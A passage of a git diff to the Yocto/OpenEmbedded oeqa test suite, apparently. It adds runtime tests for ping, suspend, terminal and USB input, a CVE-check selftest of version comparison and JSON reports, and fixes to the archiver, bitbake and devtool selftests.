+        self.assertEqual(status, 0,  msg = 'Failed to run date command, output : %s' % output)
+        
+    def test_ping(self):
+        t_thread = threading.Thread(target=self.target.run, args=("ping 8.8.8.8",))
+        t_thread.start()
+        time.sleep(2)
+        
+        status, output = self.target.run('pidof ping')
+        self.target.run('kill -9 %s' % output)
+        self.assertEqual(status, 0, msg = 'Not able to find process that runs ping, output : %s' % output)  
+        
+    def set_suspend(self): 
+        (status, output) = self.target.run('sudo rtcwake -m mem -s 10')
+        self.assertEqual(status, 0,  msg = 'Failed to suspends your system to RAM, output : %s' % output)
+    
+    @skipIfQemu('qemuall', 'Test only runs on real hardware')
+    @OETestDepends(['ssh.SSHTest.test_ssh'])
+    def test_suspend(self):
+        self.test_date()
+        self.test_ping()
+        self.set_suspend()
+        self.test_date()
+        self.test_ping()
diff --git a/meta/lib/oeqa/runtime/cases/terminal.py b/meta/lib/oeqa/runtime/cases/terminal.py
new file mode 100644
index 0000000000..8fcca99f47
--- /dev/null
+++ b/meta/lib/oeqa/runtime/cases/terminal.py
@@ -0,0 +1,21 @@
+from oeqa.runtime.case import OERuntimeTestCase
+from oeqa.core.decorator.depends import OETestDepends
+from oeqa.runtime.decorator.package import OEHasPackage
+
+import threading
+import time
+
+class TerminalTest(OERuntimeTestCase):
+
+    @OEHasPackage(['matchbox-terminal'])
+    @OETestDepends(['ssh.SSHTest.test_ssh'])
+    def test_terminal_running(self):
+        t_thread = threading.Thread(target=self.target.run, args=("export DISPLAY=:0 && matchbox-terminal -e 'sh -c \"uname -a && exec sh\"'",))
+        t_thread.start()
+        time.sleep(2)
+        
+        status, output = self.target.run('pidof matchbox-terminal')
+        number_of_terminal = len(output.split())
+        self.assertEqual(number_of_terminal, 1, msg='There should be only one terminal being launched. Number of terminal launched : %s' % number_of_terminal)
+        self.target.run('kill -9 %s' % output)
+        self.assertEqual(status, 0, msg='Not able to find process that runs terminal.')     
diff --git a/meta/lib/oeqa/runtime/cases/usb_hid.py b/meta/lib/oeqa/runtime/cases/usb_hid.py
new file mode 100644
index 0000000000..3c292cf661
--- /dev/null
+++ b/meta/lib/oeqa/runtime/cases/usb_hid.py
@@ -0,0 +1,22 @@
+from oeqa.runtime.case import OERuntimeTestCase
+from oeqa.core.decorator.depends import OETestDepends
+from oeqa.core.decorator.data import skipIfQemu
+from oeqa.runtime.decorator.package import OEHasPackage
+
+class USB_HID_Test(OERuntimeTestCase):
+
+    def keyboard_mouse_simulation(self): 
+        (status, output) = self.target.run('export DISPLAY=:0 && xdotool key F2 && xdotool mousemove 100 100')
+        return self.assertEqual(status, 0,  msg = 'Failed to simulate keyboard/mouse input event, output : %s' % output)
+             
+    def set_suspend(self): 
+        (status, output) = self.target.run('sudo rtcwake -m mem -s 10')
+        return self.assertEqual(status, 0,  msg = 'Failed to suspends your system to RAM, output : %s' % output)
+    
+    @OEHasPackage(['xdotool'])
+    @skipIfQemu('qemuall', 'Test only runs on real hardware')
+    @OETestDepends(['ssh.SSHTest.test_ssh'])
+    def test_USB_Hid_input(self):
+        self.keyboard_mouse_simulation()
+        self.set_suspend()
+        self.keyboard_mouse_simulation()  
diff --git a/meta/lib/oeqa/runtime/context.py b/meta/lib/oeqa/runtime/context.py
index 3826f27642..8a0dbd0736 100644
--- a/meta/lib/oeqa/runtime/context.py
+++ b/meta/lib/oeqa/runtime/context.py
@@ -5,6 +5,7 @@
 #
 
 import os
+import sys
 
 from oeqa.core.context import OETestContext, OETestContextExecutor
 from oeqa.core.target.ssh import OESSHTarget
@@ -66,11 +67,11 @@ class OERuntimeTestContextExecutor(OETestContextExecutor):
                 % self.default_target_type)
         runtime_group.add_argument('--target-ip', action='store',
                 default=self.default_target_ip,
-                help="IP address of device under test, default: %s" \
+                help="IP address and optionally ssh port (default 22) of device under test, for example '192.168.0.7:22'. Default: %s" \
                 % self.default_target_ip)
         runtime_group.add_argument('--server-ip', action='store',
                 default=self.default_target_ip,
-                help="IP address of device under test, default: %s" \
+                help="IP address of the test host from test target machine, default: %s" \
                 % self.default_server_ip)
 
         runtime_group.add_argument('--host-dumper-dir', action='store',
@@ -119,8 +120,7 @@ class OERuntimeTestContextExecutor(OETestContextExecutor):
             # XXX: Don't base your targets on this code it will be refactored
             # in the near future.
             # Custom target module loading
-            target_modules_path = kwargs.get('target_modules_path', '')
-            controller = OERuntimeTestContextExecutor.getControllerModule(target_type, target_modules_path)
+            controller = OERuntimeTestContextExecutor.getControllerModule(target_type)
             target = controller(logger, target_ip, server_ip, **kwargs)
 
         return target
@@ -130,15 +130,15 @@ class OERuntimeTestContextExecutor(OETestContextExecutor):
     # AttributeError raised if not found.
     # ImportError raised if a provided module can not be imported.
     @staticmethod
-    def getControllerModule(target, target_modules_path):
-        controllerslist = OERuntimeTestContextExecutor._getControllerModulenames(target_modules_path)
+    def getControllerModule(target):
+        controllerslist = OERuntimeTestContextExecutor._getControllerModulenames()
         controller = OERuntimeTestContextExecutor._loadControllerFromName(target, controllerslist)
         return controller
 
     # Return a list of all python modules in lib/oeqa/controllers for each
     # layer in bbpath
     @staticmethod
-    def _getControllerModulenames(target_modules_path):
+    def _getControllerModulenames():
 
         controllerslist = []
 
@@ -153,9 +153,8 @@ class OERuntimeTestContextExecutor(OETestContextExecutor):
                 else:
                     raise RuntimeError("Duplicate controller module found for %s. Layers should create unique controller module names" % module)
 
-        extpath = target_modules_path.split(':')
-        for p in extpath:
-            controllerpath = os.path.join(p, 'lib', 'oeqa', 'controllers')
+        for p in sys.path:
+            controllerpath = os.path.join(p, 'oeqa', 'controllers')
             if os.path.exists(controllerpath):
                 add_controller_list(controllerpath)
         return controllerslist
@@ -175,16 +174,12 @@ class OERuntimeTestContextExecutor(OETestContextExecutor):
     # Search for and return a controller or None from given module name
     @staticmethod
     def _loadControllerFromModule(target, modulename):
-        obj = None
-        # import module, allowing it to raise import exception
-        module = __import__(modulename, globals(), locals(), [target])
-        # look for target class in the module, catching any exceptions as it
-        # is valid that a module may not have the target class.
         try:
-            obj = getattr(module, target)
-        except:
-            obj = None
-        return obj
+            import importlib
+            module = importlib.import_module(modulename)
+            return getattr(module, target)
+        except AttributeError:
+            return None
 
     @staticmethod
     def readPackagesManifest(manifest):
diff --git a/meta/lib/oeqa/sdk/cases/buildepoxy.py b/meta/lib/oeqa/sdk/cases/buildepoxy.py
index 385f8ccca8..f69f720cd6 100644
--- a/meta/lib/oeqa/sdk/cases/buildepoxy.py
+++ b/meta/lib/oeqa/sdk/cases/buildepoxy.py
@@ -17,7 +17,7 @@ class EpoxyTest(OESDKTestCase):
     """
     def setUp(self):
         if not (self.tc.hasHostPackage("nativesdk-meson")):
-            raise unittest.SkipTest("GalculatorTest class: SDK doesn't contain Meson")
+            raise unittest.SkipTest("EpoxyTest class: SDK doesn't contain Meson")
 
     def test_epoxy(self):
         with tempfile.TemporaryDirectory(prefix="epoxy", dir=self.tc.sdk_dir) as testdir:
diff --git a/meta/lib/oeqa/selftest/cases/archiver.py b/meta/lib/oeqa/selftest/cases/archiver.py
index bc5447d2a3..6a5c8ec71e 100644
--- a/meta/lib/oeqa/selftest/cases/archiver.py
+++ b/meta/lib/oeqa/selftest/cases/archiver.py
@@ -35,11 +35,11 @@ class Archiver(OESelftestTestCase):
         src_path = os.path.join(bb_vars['DEPLOY_DIR_SRC'], bb_vars['TARGET_SYS'])
 
         # Check that include_recipe was included
-        included_present = len(glob.glob(src_path + '/%s-*' % include_recipe))
+        included_present = len(glob.glob(src_path + '/%s-*/*' % include_recipe))
         self.assertTrue(included_present, 'Recipe %s was not included.' % include_recipe)
 
         # Check that exclude_recipe was excluded
-        excluded_present = len(glob.glob(src_path + '/%s-*' % exclude_recipe))
+        excluded_present = len(glob.glob(src_path + '/%s-*/*' % exclude_recipe))
         self.assertFalse(excluded_present, 'Recipe %s was not excluded.' % exclude_recipe)
 
     def test_archiver_filters_by_type(self):
@@ -67,11 +67,11 @@ class Archiver(OESelftestTestCase):
         src_path_native = os.path.join(bb_vars['DEPLOY_DIR_SRC'], bb_vars['BUILD_SYS'])
 
         # Check that target_recipe was included
-        included_present = len(glob.glob(src_path_target + '/%s-*' % target_recipe))
+        included_present = len(glob.glob(src_path_target + '/%s-*/*' % target_recipe))
         self.assertTrue(included_present, 'Recipe %s was not included.' % target_recipe)
 
         # Check that native_recipe was excluded
-        excluded_present = len(glob.glob(src_path_native + '/%s-*' % native_recipe))
+        excluded_present = len(glob.glob(src_path_native + '/%s-*/*' % native_recipe))
         self.assertFalse(excluded_present, 'Recipe %s was not excluded.' % native_recipe)
 
     def test_archiver_filters_by_type_and_name(self):
@@ -104,17 +104,17 @@ class Archiver(OESelftestTestCase):
         src_path_native = os.path.join(bb_vars['DEPLOY_DIR_SRC'], bb_vars['BUILD_SYS'])
 
         # Check that target_recipe[0] and native_recipes[1] were included
-        included_present = len(glob.glob(src_path_target + '/%s-*' % target_recipes[0]))
+        included_present = len(glob.glob(src_path_target + '/%s-*/*' % target_recipes[0]))
         self.assertTrue(included_present, 'Recipe %s was not included.' % target_recipes[0])
 
-        included_present = len(glob.glob(src_path_native + '/%s-*' % native_recipes[1]))
+        included_present = len(glob.glob(src_path_native + '/%s-*/*' % native_recipes[1]))
         self.assertTrue(included_present, 'Recipe %s was not included.' % native_recipes[1])
 
         # Check that native_recipes[0] and target_recipes[1] were excluded
-        excluded_present = len(glob.glob(src_path_native + '/%s-*' % native_recipes[0]))
+        excluded_present = len(glob.glob(src_path_native + '/%s-*/*' % native_recipes[0]))
         self.assertFalse(excluded_present, 'Recipe %s was not excluded.' % native_recipes[0])
 
-        excluded_present = len(glob.glob(src_path_target + '/%s-*' % target_recipes[1]))
+        excluded_present = len(glob.glob(src_path_target + '/%s-*/*' % target_recipes[1]))
         self.assertFalse(excluded_present, 'Recipe %s was not excluded.' % target_recipes[1])
 
 
diff --git a/meta/lib/oeqa/selftest/cases/bblayers.py b/meta/lib/oeqa/selftest/cases/bblayers.py
index f131d9856c..7d74833f61 100644
--- a/meta/lib/oeqa/selftest/cases/bblayers.py
+++ b/meta/lib/oeqa/selftest/cases/bblayers.py
@@ -12,6 +12,11 @@ from oeqa.selftest.case import OESelftestTestCase
 
 class BitbakeLayers(OESelftestTestCase):
 
+    def test_bitbakelayers_layerindexshowdepends(self):
+        result = runCmd('bitbake-layers layerindex-show-depends meta-poky')
+        find_in_contents = re.search("openembedded-core", result.output)
+        self.assertTrue(find_in_contents, msg = "openembedded-core should have been listed at this step. bitbake-layers layerindex-show-depends meta-poky output: %s" % result.output)
+
     def test_bitbakelayers_showcrossdepends(self):
         result = runCmd('bitbake-layers show-cross-depends')
         self.assertIn('aspell', result.output)
diff --git a/meta/lib/oeqa/selftest/cases/bbtests.py b/meta/lib/oeqa/selftest/cases/bbtests.py
index dc423ec439..0b88316950 100644
--- a/meta/lib/oeqa/selftest/cases/bbtests.py
+++ b/meta/lib/oeqa/selftest/cases/bbtests.py
@@ -148,9 +148,6 @@ INHERIT_remove = \"report-error\"
         self.delete_recipeinc('man-db')
         self.assertEqual(result.status, 1, msg="Command succeded when it should have failed. bitbake output: %s" % result.output)
         self.assertIn('Fetcher failure: Unable to find file file://invalid anywhere. The paths that were searched were:', result.output)
-        line = self.getline(result, 'Fetcher failure for URL: \'file://invalid\'. Unable to fetch URL from any source.')
-        self.assertTrue(line and line.startswith("ERROR:"), msg = "\"invalid\" file \
-doesn't exist, yet fetcher didn't report any error. bitbake output: %s" % result.output)
 
     def test_rename_downloaded_file(self):
         # TODO unique dldir instead of using cleanall
@@ -160,7 +157,7 @@ SSTATE_DIR = \"${TOPDIR}/download-selftest\"
 """)
         self.track_for_cleanup(os.path.join(self.builddir, "download-selftest"))
 
-        data = 'SRC_URI = "${GNU_MIRROR}/aspell/aspell-${PV}.tar.gz;downloadfilename=test-aspell.tar.gz"'
+        data = 'SRC_URI = "https://downloads.yoctoproject.org/mirror/sources/aspell-${PV}.tar.gz;downloadfilename=test-aspell.tar.gz"'
         self.write_recipeinc('aspell', data)
         result = bitbake('-f -c fetch aspell', ignore_status=True)
         self.delete_recipeinc('aspell')
@@ -188,6 +185,10 @@ SSTATE_DIR = \"${TOPDIR}/download-selftest\"
         self.assertTrue(find, "No version returned for searched recipe. bitbake output: %s" % result.output)
 
     def test_prefile(self):
+        # Test when the prefile does not exist
+        result = runCmd('bitbake -r conf/prefile.conf', ignore_status=True)
+        self.assertEqual(1, result.status, "bitbake didn't error and should have when a specified prefile didn't exist: %s" % result.output)
+        # Test when the prefile exists
         preconf = os.path.join(self.builddir, 'conf/prefile.conf')
         self.track_for_cleanup(preconf)
         ftools.write_file(preconf ,"TEST_PREFILE=\"prefile\"")
@@ -198,6 +199,10 @@ SSTATE_DIR = \"${TOPDIR}/download-selftest\"
         self.assertIn('localconf', result.output)
 
     def test_postfile(self):
+        # Test when the postfile does not exist
+        result = runCmd('bitbake -R conf/postfile.conf', ignore_status=True)
+        self.assertEqual(1, result.status, "bitbake didn't error and should have when a specified postfile didn't exist: %s" % result.output)
+        # Test when the postfile exists
         postconf = os.path.join(self.builddir, 'conf/postfile.conf')
         self.track_for_cleanup(postconf)
         ftools.write_file(postconf , "TEST_POSTFILE=\"postfile\"")
diff --git a/meta/lib/oeqa/selftest/cases/buildoptions.py b/meta/lib/oeqa/selftest/cases/buildoptions.py
index e91f0bd18f..b1b9ea7e55 100644
--- a/meta/lib/oeqa/selftest/cases/buildoptions.py
+++ b/meta/lib/oeqa/selftest/cases/buildoptions.py
@@ -57,15 +57,15 @@ class ImageOptionsTests(OESelftestTestCase):
 class DiskMonTest(OESelftestTestCase):
 
     def test_stoptask_behavior(self):
-        self.write_config('BB_DISKMON_DIRS = "STOPTASKS,${TMPDIR},100000G,100K"')
+        self.write_config('BB_DISKMON_DIRS = "STOPTASKS,${TMPDIR},100000G,100K"\nBB_HEARTBEAT_EVENT = "1"')
         res = bitbake("delay -c delay", ignore_status = True)
         self.assertTrue('ERROR: No new tasks can be executed since the disk space monitor action is "STOPTASKS"!' in res.output, msg = "Tasks should have stopped. Disk monitor is set to STOPTASK: %s" % res.output)
         self.assertEqual(res.status, 1, msg = "bitbake reported exit code %s. It should have been 1. Bitbake output: %s" % (str(res.status), res.output))
-        self.write_config('BB_DISKMON_DIRS = "ABORT,${TMPDIR},100000G,100K"')
+        self.write_config('BB_DISKMON_DIRS = "ABORT,${TMPDIR},100000G,100K"\nBB_HEARTBEAT_EVENT = "1"')
         res = bitbake("delay -c delay", ignore_status = True)
         self.assertTrue('ERROR: Immediately abort since the disk space monitor action is "ABORT"!' in res.output, "Tasks should have been aborted immediatelly. Disk monitor is set to ABORT: %s" % res.output)
         self.assertEqual(res.status, 1, msg = "bitbake reported exit code %s. It should have been 1. Bitbake output: %s" % (str(res.status), res.output))
-        self.write_config('BB_DISKMON_DIRS = "WARN,${TMPDIR},100000G,100K"')
+        self.write_config('BB_DISKMON_DIRS = "WARN,${TMPDIR},100000G,100K"\nBB_HEARTBEAT_EVENT = "1"')
         res = bitbake("delay -c delay")
         self.assertTrue('WARNING: The free space' in res.output, msg = "A warning should have been displayed for disk monitor is set to WARN: %s" %res.output)
 
diff --git a/meta/lib/oeqa/selftest/cases/cve_check.py b/meta/lib/oeqa/selftest/cases/cve_check.py
new file mode 100644
index 0000000000..22ffeffd29
--- /dev/null
+++ b/meta/lib/oeqa/selftest/cases/cve_check.py
@@ -0,0 +1,220 @@
+import json
+import os
+from oeqa.selftest.case import OESelftestTestCase
+from oeqa.utils.commands import bitbake, get_bb_vars
+
+class CVECheck(OESelftestTestCase):
+
+    def test_version_compare(self):
+        from oe.cve_check import Version
+
+        result = Version("100") > Version("99")
+        self.assertTrue( result, msg="Failed to compare version '100' > '99'")
+        result = Version("2.3.1") > Version("2.2.3")
+        self.assertTrue( result, msg="Failed to compare version '2.3.1' > '2.2.3'")
+        result = Version("2021-01-21") > Version("2020-12-25")
+        self.assertTrue( result, msg="Failed to compare version '2021-01-21' > '2020-12-25'")
+        result = Version("1.2-20200910") < Version("1.2-20200920")
+        self.assertTrue( result, msg="Failed to compare version '1.2-20200910' < '1.2-20200920'")
+
+        result = Version("1.0") >= Version("1.0beta")
+        self.assertTrue( result, msg="Failed to compare version '1.0' >= '1.0beta'")
+        result = Version("1.0-rc2") > Version("1.0-rc1")
+        self.assertTrue( result, msg="Failed to compare version '1.0-rc2' > '1.0-rc1'")
+        result = Version("1.0.alpha1") < Version("1.0")
+        self.assertTrue( result, msg="Failed to compare version '1.0.alpha1' < '1.0'")
+        result = Version("1.0_dev") <= Version("1.0")
+        self.assertTrue( result, msg="Failed to compare version '1.0_dev' <= '1.0'")
+
+        # ignore "p1" and "p2", so these should be equal
+        result = Version("1.0p2") == Version("1.0p1")
+        self.assertTrue( result ,msg="Failed to compare version '1.0p2' to '1.0p1'")
+        # ignore the "b" and "r"
+        result = Version("1.0b") == Version("1.0r")
+        self.assertTrue( result ,msg="Failed to compare version '1.0b' to '1.0r'")
+
+        # consider the trailing alphabet as patched level when comparing
+        result = Version("1.0b","alphabetical") < Version("1.0r","alphabetical")
+        self.assertTrue( result ,msg="Failed to compare version with suffix '1.0b' < '1.0r'")
+        result = Version("1.0b","alphabetical") > Version("1.0","alphabetical")
+        self.assertTrue( result ,msg="Failed to compare version with suffix '1.0b' > '1.0'")
+
+        # consider the trailing "p" and "patch" as patched released when comparing
+        result = Version("1.0","patch") < Version("1.0p1","patch")
+        self.assertTrue( result ,msg="Failed to compare version with suffix '1.0' < '1.0p1'")
+        result = Version("1.0p2","patch") > Version("1.0p1","patch")
+        self.assertTrue( result ,msg="Failed to compare version with suffix '1.0p2' > '1.0p1'")
+        result = Version("1.0_patch2","patch") < Version("1.0_patch3","patch")
+        self.assertTrue( result ,msg="Failed to compare version with suffix '1.0_patch2' < '1.0_patch3'")
+
+
+    def test_convert_cve_version(self):
+        from oe.cve_check import convert_cve_version
+
+        # Default format
+        self.assertEqual(convert_cve_version("8.3"), "8.3")
+        self.assertEqual(convert_cve_version(""), "")
+
+        # OpenSSL format version
+        self.assertEqual(convert_cve_version("1.1.1t"), "1.1.1t")
+
+        # OpenSSH format
+        self.assertEqual(convert_cve_version("8.3_p1"), "8.3p1")
+        self.assertEqual(convert_cve_version("8.3_p22"), "8.3p22")
+
+        # Linux kernel format
+        self.assertEqual(convert_cve_version("6.2_rc8"), "6.2-rc8")
+        self.assertEqual(convert_cve_version("6.2_rc31"), "6.2-rc31")
+
+
+    def test_recipe_report_json(self):
+        config = """
+INHERIT += "cve-check"
+CVE_CHECK_FORMAT_JSON = "1"
+"""
+        self.write_config(config)
+
+        vars = get_bb_vars(["CVE_CHECK_SUMMARY_DIR", "CVE_CHECK_SUMMARY_FILE_NAME_JSON"])
+        summary_json = os.path.join(vars["CVE_CHECK_SUMMARY_DIR"], vars["CVE_CHECK_SUMMARY_FILE_NAME_JSON"])
+        recipe_json = os.path.join(vars["CVE_CHECK_SUMMARY_DIR"], "m4-native_cve.json")
+
+        try:
+            os.remove(summary_json)
+            os.remove(recipe_json)
+        except FileNotFoundError:
+            pass
+
+        bitbake("m4-native -c cve_check")
+
+        def check_m4_json(filename):
+            with open(filename) as f:
+                report = json.load(f)
+            self.assertEqual(report["version"], "1")
+            self.assertEqual(len(report["package"]), 1)
+            package = report["package"][0]
+            self.assertEqual(package["name"], "m4-native")
+            found_cves = { issue["id"]: issue["status"] for issue in package["issue"]}
+            self.assertIn("CVE-2008-1687", found_cves)
+            self.assertEqual(found_cves["CVE-2008-1687"], "Patched")
+
+        self.assertExists(summary_json)
+        check_m4_json(summary_json)
+        self.assertExists(recipe_json)
+        check_m4_json(recipe_json)
+
+
+    def test_image_json(self):
+        config = """
+INHERIT += "cve-check"
+CVE_CHECK_FORMAT_JSON = "1"
+"""
+        self.write_config(config)
+
+        vars = get_bb_vars(["CVE_CHECK_DIR", "CVE_CHECK_SUMMARY_DIR", "CVE_CHECK_SUMMARY_FILE_NAME_JSON"])
+        report_json = os.path.join(vars["CVE_CHECK_SUMMARY_DIR"], vars["CVE_CHECK_SUMMARY_FILE_NAME_JSON"])
+        print(report_json)
+        try:
+            os.remove(report_json)
+        except FileNotFoundError:
+            pass
+
+        bitbake("core-image-minimal-initramfs")
+        self.assertExists(report_json)
+
+        # Check that the summary report lists at least one package
+        with open(report_json) as f:
+            report = json.load(f)
+        self.assertEqual(report["version"], "1")
+        self.assertGreater(len(report["package"]), 1)
+
+        # Check that a random recipe wrote a recipe report to deploy/cve/
+        recipename = report["package"][0]["name"]
+        recipe_report = os.path.join(vars["CVE_CHECK_DIR"], recipename + "_cve.json")
+        self.assertExists(recipe_report)
+        with open(recipe_report) as f:
+            report = json.load(f)
+        self.assertEqual(report["version"], "1")
+        self.assertEqual(len(report["package"]), 1)
+        self.assertEqual(report["package"][0]["name"], recipename)
+
+
+    def test_recipe_report_json_unpatched(self):
+        config = """
+INHERIT += "cve-check"
+CVE_CHECK_FORMAT_JSON = "1"
+CVE_CHECK_REPORT_PATCHED = "0"
+"""
+        self.write_config(config)
+
+        vars = get_bb_vars(["CVE_CHECK_SUMMARY_DIR", "CVE_CHECK_SUMMARY_FILE_NAME_JSON"])
+        summary_json = os.path.join(vars["CVE_CHECK_SUMMARY_DIR"], vars["CVE_CHECK_SUMMARY_FILE_NAME_JSON"])
+        recipe_json = os.path.join(vars["CVE_CHECK_SUMMARY_DIR"], "m4-native_cve.json")
+
+        try:
+            os.remove(summary_json)
+            os.remove(recipe_json)
+        except FileNotFoundError:
+            pass
+
+        bitbake("m4-native -c cve_check")
+
+        def check_m4_json(filename):
+            with open(filename) as f:
+                report = json.load(f)
+            self.assertEqual(report["version"], "1")
+            self.assertEqual(len(report["package"]), 1)
+            package = report["package"][0]
+            self.assertEqual(package["name"], "m4-native")
+            #m4 had only Patched CVEs, so the issues array will be empty
+            self.assertEqual(package["issue"], [])
+
+        self.assertExists(summary_json)
+        check_m4_json(summary_json)
+        self.assertExists(recipe_json)
+        check_m4_json(recipe_json)
+
+
+    def test_recipe_report_json_ignored(self):
+        config = """
+INHERIT += "cve-check"
+CVE_CHECK_FORMAT_JSON = "1"
+CVE_CHECK_REPORT_PATCHED = "1"
+"""
+        self.write_config(config)
+
+        vars = get_bb_vars(["CVE_CHECK_SUMMARY_DIR", "CVE_CHECK_SUMMARY_FILE_NAME_JSON"])
+        summary_json = os.path.join(vars["CVE_CHECK_SUMMARY_DIR"], vars["CVE_CHECK_SUMMARY_FILE_NAME_JSON"])
+        recipe_json = os.path.join(vars["CVE_CHECK_SUMMARY_DIR"], "logrotate_cve.json")
+
+        try:
+            os.remove(summary_json)
+            os.remove(recipe_json)
+        except FileNotFoundError:
+            pass
+
+        bitbake("logrotate -c cve_check")
+
+        def check_m4_json(filename):
+            with open(filename) as f:
+                report = json.load(f)
+            self.assertEqual(report["version"], "1")
+            self.assertEqual(len(report["package"]), 1)
+            package = report["package"][0]
+            self.assertEqual(package["name"], "logrotate")
+            found_cves = { issue["id"]: issue["status"] for issue in package["issue"]}
+            # m4 CVE should not be in logrotate
+            self.assertNotIn("CVE-2008-1687", found_cves)
+            # logrotate has both Patched and Ignored CVEs
+            self.assertIn("CVE-2011-1098", found_cves)
+            self.assertEqual(found_cves["CVE-2011-1098"], "Patched")
+            self.assertIn("CVE-2011-1548", found_cves)
+            self.assertEqual(found_cves["CVE-2011-1548"], "Ignored")
+            self.assertIn("CVE-2011-1549", found_cves)
+            self.assertEqual(found_cves["CVE-2011-1549"], "Ignored")
+            self.assertIn("CVE-2011-1550", found_cves)
+            self.assertEqual(found_cves["CVE-2011-1550"], "Ignored")
+
+        self.assertExists(summary_json)
+        check_m4_json(summary_json)
+        self.assertExists(recipe_json)
+        check_m4_json(recipe_json)
diff --git a/meta/lib/oeqa/selftest/cases/devtool.py b/meta/lib/oeqa/selftest/cases/devtool.py
index d8bf4aea08..9efe342a0d 100644
--- a/meta/lib/oeqa/selftest/cases/devtool.py
+++ b/meta/lib/oeqa/selftest/cases/devtool.py
@@ -8,6 +8,7 @@ import shutil
 import tempfile
 import glob
 import fnmatch
+import unittest
 
 import oeqa.utils.ftools as ftools
 from oeqa.selftest.case import OESelftestTestCase
@@ -38,6 +39,13 @@ def setUpModule():
             canonical_layerpath = os.path.realpath(canonical_layerpath) + '/'
             edited_layers.append(layerpath)
             oldmetapath = os.path.realpath(layerpath)
+
+            # when downloading poky from tar.gz some tests will be skipped (BUG 12389)
+            try:
+                runCmd('git rev-parse --is-inside-work-tree', cwd=canonical_layerpath)
+            except:
+                raise unittest.SkipTest("devtool tests require folder to be a git repo")
+
             result = runCmd('git rev-parse --show-toplevel', cwd=canonical_layerpath)
             oldreporoot = result.output.rstrip()
             newmetapath = os.path.join(corecopydir, os.path.relpath(oldmetapath, oldreporoot))
@@ -57,7 +65,7 @@ def setUpModule():
                         if relpth.endswith('/'):
                             destdir = os.path.join(corecopydir, relpth)
                             # avoid race condition by not copying .pyc files YPBZ#13421,13803
-                            shutil.copytree(pth, destdir, ignore=ignore_patterns('*.pyc', '__pycache__'))
+                            shutil.copytree(pth, destdir, ignore=shutil.ignore_patterns('*.pyc', '__pycache__'))
                         else:
                             destdir = os.path.join(corecopydir, os.path.dirname(relpth))
                             bb.utils.mkdirhier(destdir)
@@ -269,7 +277,7 @@ class DevtoolAddTests(DevtoolBase):
         self.track_for_cleanup(tempdir)
         pn = 'pv'
         pv = '1.5.3'
-        url = 'http://www.ivarch.com/programs/sources/pv-1.5.3.tar.bz2'
+        url = 'http://downloads.yoctoproject.org/mirror/sources/pv-1.5.3.tar.bz2'
         result = runCmd('wget %s' % url, cwd=tempdir)
         result = runCmd('tar xfv %s' % os.path.basename(url), cwd=tempdir)
         srcdir = os.path.join(tempdir, '%s-%s' % (pn, pv))
@@ -340,7 +348,7 @@ class DevtoolAddTests(DevtoolBase):
         checkvars['LIC_FILES_CHKSUM'] = 'file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263'
         checkvars['S'] = '${WORKDIR}/git'
         checkvars['PV'] = '0.1+git${SRCPV}'
-        checkvars['SRC_URI'] = 'git://git.yoctoproject.org/git/dbus-wait;protocol=https'
+        checkvars['SRC_URI'] = 'git://git.yoctoproject.org/git/dbus-wait;protocol=https;branch=master'
         checkvars['SRCREV'] = srcrev
         checkvars['DEPENDS'] = set(['dbus'])
         self._test_recipe_contents(recipefile, checkvars, [])
@@ -442,6 +450,7 @@ class DevtoolAddTests(DevtoolBase):
         tempdir = tempfile.mkdtemp(prefix='devtoolqa')
         self.track_for_cleanup(tempdir)
         url = 'gitsm://git.yoctoproject.org/mraa'
+        url_branch = '%s;branch=master' % url
         checkrev = 'ae127b19a50aa54255e4330ccfdd9a5d058e581d'
         testrecipe = 'mraa'
         srcdir = os.path.join(tempdir, testrecipe)
@@ -462,7 +471,7 @@ class DevtoolAddTests(DevtoolBase):
         checkvars = {}
         checkvars['S'] = '${WORKDIR}/git'
         checkvars['PV'] = '1.0+git${SRCPV}'
-        checkvars['SRC_URI'] = url
+        checkvars['SRC_URI'] = url_branch
         checkvars['SRCREV'] = '${AUTOREV}'
         self._test_recipe_contents(recipefile, checkvars, [])
         # Try with revision and version specified
@@ -481,7 +490,7 @@ class DevtoolAddTests(DevtoolBase):
         checkvars = {}
         checkvars['S'] = '${WORKDIR}/git'
         checkvars['PV'] = '1.5+git${SRCPV}'
-        checkvars['SRC_URI'] = url
+        checkvars['SRC_URI'] = url_branch
         checkvars['SRCREV'] = checkrev
         self._test_recipe_contents(recipefile, checkvars, [])
 
@@ -693,7 +702,44 @@ class DevtoolModifyTests(DevtoolBase):
 
         self.assertTrue(bbclassextended, 'None of these recipes are BBCLASSEXTENDed to native - need to adjust testrecipes list: %s' % ', '.join(testrecipes))
         self.assertTrue(inheritnative, 'None of these recipes do "inherit native" - need to adjust testrecipes list: %s' % ', '.join(testrecipes))
+    def test_devtool_modify_localfiles_only(self):
+        # Check preconditions
+        testrecipe = 'base-files'
+        src_uri = (get_bb_var('SRC_URI', testrecipe) or '').split()
+        foundlocalonly = False
+        correct_symlink = False
+        for item in src_uri:
+            if item.startswith('file://'):
+                if '.patch' not in item:
+                    foundlocalonly = True
+            else:
+                foundlocalonly = False
+                break
+        self.assertTrue(foundlocalonly, 'This test expects the %s recipe to fetch local files only and it seems that it no longer does' % testrecipe)
+        # Clean up anything in the workdir/sysroot/sstate cache
+        bitbake('%s -c cleansstate' % testrecipe)
+        # Try modifying a recipe
+        tempdir = tempfile.mkdtemp(prefix='devtoolqa')
+        self.track_for_cleanup(tempdir)
+        self.track_for_cleanup(self.workspacedir)
+        self.add_command_to_tearDown('bitbake -c clean %s' % testrecipe)
+        self.add_command_to_tearDown('bitbake-layers remove-layer */workspace')
+        result = runCmd('devtool modify %s -x %s' % (testrecipe, tempdir))
+        srcfile = os.path.join(tempdir, 'oe-local-files/share/dot.bashrc')
+        srclink = os.path.join(tempdir, 'share/dot.bashrc')
+        self.assertExists(srcfile, 'Extracted source could not be found')
+        if os.path.islink(srclink) and os.path.exists(srclink) and os.path.samefile(srcfile, srclink):
+            correct_symlink = True
+        self.assertTrue(correct_symlink, 'Source symlink to oe-local-files is broken')
 
+        matches = glob.glob(os.path.join(self.workspacedir, 'appends', '%s_*.bbappend' % testrecipe))
+        self.assertTrue(matches, 'bbappend not created')
+        # Test devtool status
+        result = runCmd('devtool status')
+        self.assertIn(testrecipe, result.output)
+        self.assertIn(tempdir, result.output)
+        # Try building
+        bitbake(testrecipe)
 
     def test_devtool_modify_git(self):
         # Check preconditions
@@ -843,7 +889,7 @@ class DevtoolUpdateTests(DevtoolBase):
         self._check_repo_status(os.path.dirname(recipefile), expected_status)
 
         result = runCmd('git diff %s' % os.path.basename(recipefile), cwd=os.path.dirname(recipefile))
